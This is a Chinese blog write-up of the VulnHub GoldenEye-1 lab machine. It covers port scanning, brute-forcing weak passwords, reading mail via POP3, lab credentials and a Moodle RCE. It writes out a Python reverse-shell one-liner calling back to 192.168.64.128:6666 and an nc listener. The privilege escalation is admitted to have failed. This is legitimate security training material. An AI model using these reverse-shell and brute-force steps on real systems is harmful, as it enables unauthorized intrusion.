VulnHub之GoldenEye靶场(2)

本文讲述了作者在Vulnhub平台的GoldenEye-1挑战中,通过端口扫描、爆破弱口令、解析邮件线索,逐步找到隐藏的账号密码,利用POP3协议获取更多信息,并最终实现Linux系统提权的过程。涉及的技术包括Apache、邮件客户端、远程命令执行漏洞和Python逆向工程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶场信息:

地址:https://www.vulnhub.com/entry/goldeneye-1,240/
难度:简单
目标:root目录下flag.txt 文件
运行:VirtualBox(网络桥接)

信息收集

老规矩上来先扫描端口
在这里插入图片描述
常见端口开放25、80、110端口,访问网站,爆下目录(无果),随便爆破一下25端口的弱口令(无果)
在这里插入图片描述
中间件:apache
在这里插入图片描述
然后通过上面得提示访问/sev-home/这个目录,有登陆但是没有密码,这里我打算爆破来着,f12源代码里面有
在这里插入图片描述
有趣得对话,这里莫非是让我们去找那个女的,鬼才信
在这里插入图片描述
拿着:InvincibleHack3r
在这里插入图片描述
我还以为用户是UNKNOWN呢,找了半天,既然有了账号密码直接登陆,还好直接看大佬得文章了

账号:boris
密码:InvincibleHack3r

在这里插入图片描述
这里好像很厉害的样子,我们继续看看源代码,最下面有两个用户名
在这里插入图片描述
使用超级弱口令,由于这里不是默认端口,所以要自己设置一下
在这里插入图片描述

POP3 命令包括:

USER username 认证用户名        
PASS password 认证密码认证,认证通过则状态转换        
APOP name,digest 认可一种安全传输口令的办法,执行成功导致状态转换,请参见 RFC 1321 。        
STAT 处理请求 server 回送邮箱统计资料,如邮件数、 邮件总字节数        
UIDL n 处理 server 返回用于该指定邮件的唯一标识, 如果没有指定,返回所有的。        
LIST n 处理 server 返回指定邮件的大小等        
RETR n 处理 server 返回邮件的全部文本        
DELE n 处理 server 标记删除,QUIT 命令执行时才真正删除        
RSET 处理撤消所有的 DELE 命令        
TOP n,m 处理 返回 n 号邮件的前 m 行内容,m 必须是自然数        
NOOP 处理 server 返回一个肯定的响应        
QUIT 希望结束会话。如果 server 处于"处理" 状态,则现在进入"更新"状态,删除那些标记成删除的邮件。如果 server 处于"认可"状态,则结束会话时 server 不进入"更新"状态 。

在这里插入图片描述
在第二封中发现账号和密码
在这里插入图片描述
我们现根据邮件提示添加本地域名:severnaya-station.com
在这里插入图片描述
然后访问这个网站
在这里插入图片描述
使用邮件的账号和密码登陆成功
在这里插入图片描述
发现用户,但是没有密码继续爆破
在这里插入图片描述

账号:doak
密码:goat

继续看邮件,救救孩子吧!
在这里插入图片描述
又发现一个账号和密码,退出上次的账号,登陆这个
在这里插入图片描述
发现目录中有个txt,下载打开发现个图片的地址
在这里插入图片描述
打开发现一张西装男人的照片在这里插入图片描述
下载
在这里插入图片描述

根据邮件提示查看图片内容,我们通过使用strings 查看jpg内容,发现base64编码
在这里插入图片描述
解码完成,线索是个admin的密码在这里插入图片描述
发现cms的版本
在这里插入图片描述
查询moodle 2.2.3漏洞 发现存在远程命令执行漏洞
编号:cve-2013-3630
在这里插入图片描述
配置好各种参数后执行失败,靶机系统界面默认是google spell,要将靶机系统上修改为PSpellShell
在这里插入图片描述
上面那个我复现不了,这里还能上传代码

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.64.128”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

在这里插入图片描述
打开nc监听6666端口

nc -lnvp 6666

在这里插入图片描述
成功!!!tty:python -c 'import pty; pty.spawn("/bin/bash")'

提权知识:https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

啊!复现的好心累啊!两种方式都不行,哭唧唧

参考文章:
https://blog.youkuaiyun.com/shenyu_1126/article/details/109460248
https://blog.youkuaiyun.com/qq_34801745/article/details/103724325
https://www.cnblogs.com/heguoze/p/12052353.html

学习网络安全实战技能,VulnHub靶机是一个非常好的实践平台。为了系统地掌握相关技能,推荐你遵循以下学习路径:首先,确保你具备网络安全基础知识,包括网络协议、操作系统基础、编程基础和简单的Web技术知识。接着,你可以通过阅读《VulnHub靶机实战教程:全面解析与 Walkthrough》来了解如何利用靶机进行实战学习,该教程详尽介绍了多个VulnHub靶机的攻克过程。学习路径具体步骤如下: 参考资源链接:[VulnHub靶机实战教程:全面解析与 Walkthrough](https://wenku.csdn.net/doc/5armww4y1r?spm=1055.2569.3001.10343) 1. **基础技能学习**:从网络安全和渗透测试的基础知识开始,了解常见的网络攻击和防御机制,掌握使用一些基础工具,如nmap、Wireshark、Metasploit等。 2. **靶机选择**:选择一个简单的VulnHub靶机,例如DC系列靶机,从基础的网络侦查开始,逐步学习如何识别开放端口和服务。 3. **漏洞利用学习**:针对靶机上发现的漏洞,学习相应的利用方法。例如,如果靶机存在SQL注入漏洞,就学习SQL注入的原理和利用技巧。 4. **深入学习**:随着技能的提升,选择更复杂的靶机进行学习,如AI:Web:2,挑战更高级的Web漏洞利用。 5. **综合技能提升**:通过解决DC系列靶机中的多层面挑战,全面提升自己的网络侦查、漏洞分析、系统渗透等综合技能。 6. **高级挑战**:最终,可以尝试更为复杂的靶机,比如EVM:1和GoldenEye:1,挑战加密漏洞和恶意软件分析等高级技能。 7. **实践与总结**:不断实践,记录每次攻防过程,总结经验教训。学习过程中可以参考《VulnHub靶机实战教程:全面解析与 Walkthrough》中的案例,分析作者的思考过程和解决方法。 在整个学习过程中,应不断回顾和总结,尝试站在攻击者的角度思考问题,并不断提问自己:‘我在这个靶机中学到了什么?我能否应用这些知识解决实际问题?’通过这样系统的学习,你将逐渐建立起完整的网络安全知识体系,并能有效地应用于实战中。 如果你已经对基础知识有所掌握,想要进一步提升技能,建议在掌握了《VulnHub靶机实战教程:全面解析与 Walkthrough》的基础上,结合更多的实战资源进行学习。例如,参加在线的网络安全竞赛,或是在实验室环境中搭建自己的靶场进行模拟攻击。同时,可以关注一些网络安全领域的专家和他们的博客或视频教程,以获取最新的安全动态和高级技巧。 参考资源链接:[VulnHub靶机实战教程:全面解析与 Walkthrough](https://wenku.csdn.net/doc/5armww4y1r?spm=1055.2569.3001.10343)
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值